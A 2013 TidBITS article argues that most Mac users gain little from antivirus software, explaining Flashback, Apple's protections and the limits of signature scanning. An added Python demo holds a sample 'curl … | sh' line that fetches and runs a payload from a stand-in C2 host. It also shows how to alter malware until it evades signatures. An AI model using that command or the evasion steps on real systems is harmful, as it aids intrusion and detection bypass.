It has been over four years since I wrote “Should Mac Users Run Antivirus Software?” (18 March 2008). Although much has changed since then, my recommendations mostly haven’t. While Macs aren’t immune to malicious software (malware), and we even experienced one reasonably widespread incident in 2012, malware on Macs is still not nearly common enough to recommend antivirus software for everyone. And while antivirus tools are effective against certain known attacks, they often don’t provide the level of protection people expect.
More Malware, but Still Rare -- In April 2012, we experienced Flashback, the first real, widespread malware attack against Macs (see “How to Detect and Protect Against Updated Flashback Malware,” 5 April 2012). By some accounts over 500,000 Macs were infected at one point, but there is no evidence that any infected Macs or Mac users were actually harmed in the attack. This quickly led to predictions in certain corners that the Apple “age of innocence” had come to an end, and Mac users would now face as many and as severe malware attacks as Windows users.
Since that fateful week we have seen not a single additional widespread attack, and only a handful of smaller pockets of infection similar to the pre-Flashback days. (Note that there were some attacks against specific targets, but antivirus is relatively ineffective at stopping these.) Despite those predictions, Mac users haven’t seen any significant increases in malware, and it is still quite rare.
Some of this is due to steps Apple took both before and in response to Flashback, which I outlined in “Examining Apple’s Security Efforts in 2012” (20 December 2012). Gatekeeper was designed to reduce the likelihood of a user being tricked into installing malware on their own computer — still the most common attack against Macs (see “Gatekeeper Slams the Door on Mac Malware Epidemics,” 16 February 2012). Apple continues to harden the operating system itself, making it more difficult (but far from impossible) to exploit remotely. All apps in the Mac App Store must now implement sandboxing, which reduces the harm they can cause if they are compromised — although, embarrassingly, Apple has yet to sandbox its own apps. And Apple significantly changed how Java and Adobe Flash, the software exploited by Flashback, are supported and enabled to further restrict their use as a vector for infection via a Web browser.
Plus, if reports are accurate, Flashback failed to net any significant profits for the attackers. For the most part, bad guys are in it for the money, and they drop unprofitable product lines like any other business. In fact, Apple’s security changes have, by its own admission, focused more on disrupting the economics of malware than trying to stop any single vector of attack.
This doesn’t mean there won’t be successful attacks against Macs, but all signs point to those attacks being limited — occasional one-off incidents rather than the constant maelstrom of endless attacks we have seen against Windows. The ecosystem — thanks to its size and Apple’s protections — simply can’t support ongoing waves of Mac malware. Even the latest versions of Windows don’t face the same malware issues as earlier efforts.
Some of these future incidents will be widespread, but they will also very likely be discovered and contained quickly. As for antivirus, the odds are against the tools playing a significant role in preventing these attacks due to their inherent limitations.
The Limits of Antivirus -- There are two main ways to detect malicious software: detect unusual activity, or recognize something in the software that marks it as malicious. Nearly all antivirus tools on the market rely mostly or exclusively on “signatures” for malware detection.
A signature is typically a short byte pattern, or a hash value computed over all or part of a known piece of malware, that identifies that specific sample. Antivirus companies scour the Internet looking for malware samples. Once they find a malicious program, they create a signature based on the application’s code, then push this signature into the antivirus software on your computer when you update your virus definitions. Your antivirus software scans new files as they come into your computer, plus all files on your system periodically, looking for these signatures.
Security tools tend to avoid relying on behavioral analysis because it is very hard to know whether any particular action on a general purpose computer is “bad.” For any malicious action you can think of, odds are there is a legitimate reason for that activity in a different context. It is also difficult to hook into an operating system at the right level to capture this activity. And unless you detect and manage to prevent the act of infection (which may look exactly like normal software installation), the malware gets to run on your system before the tool has an opportunity to detect bad activity. Behavioral analysis is thus fairly limited, and more effective in controlled environments, such as enterprise servers, than on personal computers.
The advantage of signature scanning is that if there is a match, and the signature is well-crafted, you have positively identified a known piece of malicious software. You can also scan software before it ends up on your system or runs in the first place. But there are two very large downsides.
The most obvious limitation is that to create a signature, the antivirus vendor needs a sample of the malware. They can build signatures only for what they find, meaning new malware always has some running time before the first sample is collected, turned into a signature, and pushed down to client computers. Not every malicious program is created from scratch, so theoretically an antivirus tool should have a reasonable chance of picking up new variants. But the bad guys know this and buy the major antivirus programs to test their variants before release. Or, if they are on a budget, they run the samples through sites like VirusTotal, which test samples against dozens of antivirus tools.
The second major issue is that malware is a popular market, with massive numbers of new variants appearing daily. Some antivirus vendors report on the order of 65,000 new malware variations every day! That is 65,000 signatures they need to create, test, and release to their customers on a daily basis (now you know why it’s important to update virus definitions). Together these two factors make it nearly impossible for antivirus vendors to keep up. Their tools do filter a lot of malware, but never get close to catching everything bad, and there is always a window where new malware spreads before being detected.
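To make the signature mechanism and its blind spot concrete, here is an added example in Python; it is not code from the original article or from any antivirus vendor. It builds the three common signature styles from a constructed, inert sample script (a whole-file hash, a hash of one region, and a raw byte pattern), scans a few variants against them, and runs the attacker-side “test before release” check described above. The sample bytes, the family name Demo, and the c2.invalid host are all made up for illustration.

```python
import hashlib

# --- Constructed, inert sample bytes (not real malware) ---------------------
# A stand-in for a known malicious script, built from three lines so the
# example can point a "chunk" signature at one of them.
HEADER = b"#!/bin/sh\n"
DOWNLOADER = b"curl -s http://c2.invalid/payload | sh\n"
PERSISTENCE = b"echo persist >> ~/.profile\n"
KNOWN_SAMPLE = HEADER + DOWNLOADER + PERSISTENCE


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_signatures(sample: bytes, family: str, chunk: tuple, pattern: bytes) -> list:
    """Build the three signature styles for one sample: a hash of the whole
    file, a hash of one region, and a raw byte pattern. (Hypothetical helper.)"""
    start, end = chunk
    return [
        {"name": f"{family}.file", "kind": "file_hash", "value": sha256_hex(sample)},
        {"name": f"{family}.chunk", "kind": "chunk_hash",
         "value": sha256_hex(sample[start:end]), "start": start, "end": end},
        {"name": f"{family}.pattern", "kind": "pattern", "value": pattern},
    ]


def scan(data: bytes, signatures: list) -> list:
    """Return the names of every signature that matches `data`."""
    hits = []
    for sig in signatures:
        if sig["kind"] == "file_hash":
            matched = sha256_hex(data) == sig["value"]
        elif sig["kind"] == "chunk_hash":
            matched = sha256_hex(data[sig["start"]:sig["end"]]) == sig["value"]
        elif sig["kind"] == "pattern":
            matched = sig["value"] in data
        else:
            raise ValueError(f"unknown signature kind {sig['kind']!r}")
        if matched:
            hits.append(sig["name"])
    return hits


def undetected(data: bytes, signatures: list) -> bool:
    """The attacker's pre-release check: does the variant slip past every signature?"""
    return not scan(data, signatures)


# Vendor side: the sample was collected and turned into signatures. The chunk
# hash covers the downloader line; the pattern is the C2 path inside it.
SIGNATURES = make_signatures(
    KNOWN_SAMPLE, "Demo",
    chunk=(len(HEADER), len(HEADER) + len(DOWNLOADER)),
    pattern=b"c2.invalid/payload",
)

# Attacker side: three cheap edits, each checked against the signatures before
# "release". The script behaves identically in every case.
VARIANT_PADDED = KNOWN_SAMPLE + b"# build 2\n"                     # append a comment
VARIANT_REBUILT = KNOWN_SAMPLE.replace(b"curl -s ", b"curl -fs ")  # touch the hashed region
VARIANT_OBFUSCATED = VARIANT_REBUILT.replace(                       # break the byte pattern
    b"c2.invalid/payload", b"c2.invalid/pay''load")                # the shell joins 'pay''load'

if __name__ == "__main__":
    for label, data in [("original", KNOWN_SAMPLE), ("padded", VARIANT_PADDED),
                        ("rebuilt", VARIANT_REBUILT), ("obfuscated", VARIANT_OBFUSCATED)]:
        print(f"{label:11s} hits={scan(data, SIGNATURES)} undetected={undetected(data, SIGNATURES)}")
```

Appending a comment already defeats the whole-file hash; editing one flag inside the hashed region defeats the region hash; splitting the string the pattern keys on defeats the last signature, with no change in what the script does. That last loop (edit, rescan, repeat until `undetected` is true) is exactly what an attacker gets from buying the major antivirus products or uploading to a multi-engine scanning site, and it is why a signature built from today’s sample says nothing about tomorrow’s variant.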
Far less malware exists for Macs, but even there we see limited effectiveness across tools. For example, in a recent test by Thomas Reed, even the best Mac malware tool detected only 90 percent of the known malware samples used. This is a poor showing — we only see dozens of Mac malware variants per year, compared to 65,000 per day for Windows.
Despite Flashback being used as a call to arms to encourage people to adopt antivirus tools, most of those tools failed to detect Flashback for weeks — until it was highly publicized.
There are additional technical issues, as well. The more analysis and detection you want, the deeper antivirus tools need to hook into your system, and the greater their potential for failure. Apple doesn’t help much, being much more concerned with preventing malware from taking over the operating system than with helping antivirus vendors — who, after all, need to monitor all access to files and exercise control over launching applications and opening files, which are just the kinds of things malware authors want to do, too. There are also major performance impacts, and nearly every antivirus vendor has issued a bad signature at some point, causing serious issues for customers — typically false claims that a critical system or application file is a virus, which of course causes problems when the software attempts to prevent the (critical, legitimate) file from “compromising” the system.
Considering the current state of Mac security and the malware environment today, I find it hard to recommend Mac antivirus tools for most consumers. OS X’s built-in security and basic malware protection currently stops most or even all existing Mac malware, and new malware variants don’t appear often enough for antivirus tools to provide a significant benefit by protecting personal Macs. Mac infections are so rare, and antivirus tools are so limited, that they simply don’t offer enough value for most Mac users — even the free ones.
When to Use Mac Antivirus -- Those limitations aside, there are situations where antivirus software is still useful.
The first, and best, is when you don’t use it on the desktop. Signature-based filtering in email stops known viruses before they ever hit your desktop. I highly recommend using an email service such as Gmail, iCloud, Yahoo, or Hotmail that filters all email for viruses before it is downloaded to your computer. For businesses I also recommend Web filtering, but that isn’t easily available to regular consumers.
The next group who might benefit from antivirus is family members running older versions of OS X. Nearly all the best anti-malware security features of OS X are available with 10.8 Mountain Lion, with 10.7 Lion being second-best. We know TidBITS readers largely stay up to date with Mac and iOS operating system updates, but if family members don’t, then antivirus may be warranted.
Corporate users may also need antivirus software to comply with corporate policies or other requirements.
If you consistently engage in high-risk behavior, then antivirus software may be useful. For example, if you turn off Gatekeeper and routinely download illegal or dubious software, antivirus tools might prevent infection. Maybe. Of course malware appears on mainstream sites as well, but if you stick with Gatekeeper and known developers your chance of infection is almost nil.
Lastly, you might simply want antivirus for peace of mind — understanding that antivirus tools are far from infallible, and their users do still get infected, especially if you ignore the necessary patches and definition updates.
If Mac antivirus tools offered 100 percent effectiveness — or even 99 percent — I might take a different position. If we ever see massive volumes of malware, as happens in the Windows world, I might change my recommendations. But at this point, there are so few Mac malware infections, and antivirus tools are so limited, that for most users of current versions of OS X, antivirus doesn’t make sense.
During the Flashback infection there were accusations that Mac users were too smug, or too ill-informed, to install antivirus software. But the reality is that antivirus tools offer only limited protection, and relying on antivirus for your security is as naive as believing Macs are invulnerable.
Unless otherwise noted, this article is copyright © 2013 TidBITS Publishing, Inc. Published in TidBITS on 2013-01-08.
TidBITS is copyright © 2012 TidBITS Publishing Inc. Reuse governed by Creative Commons License.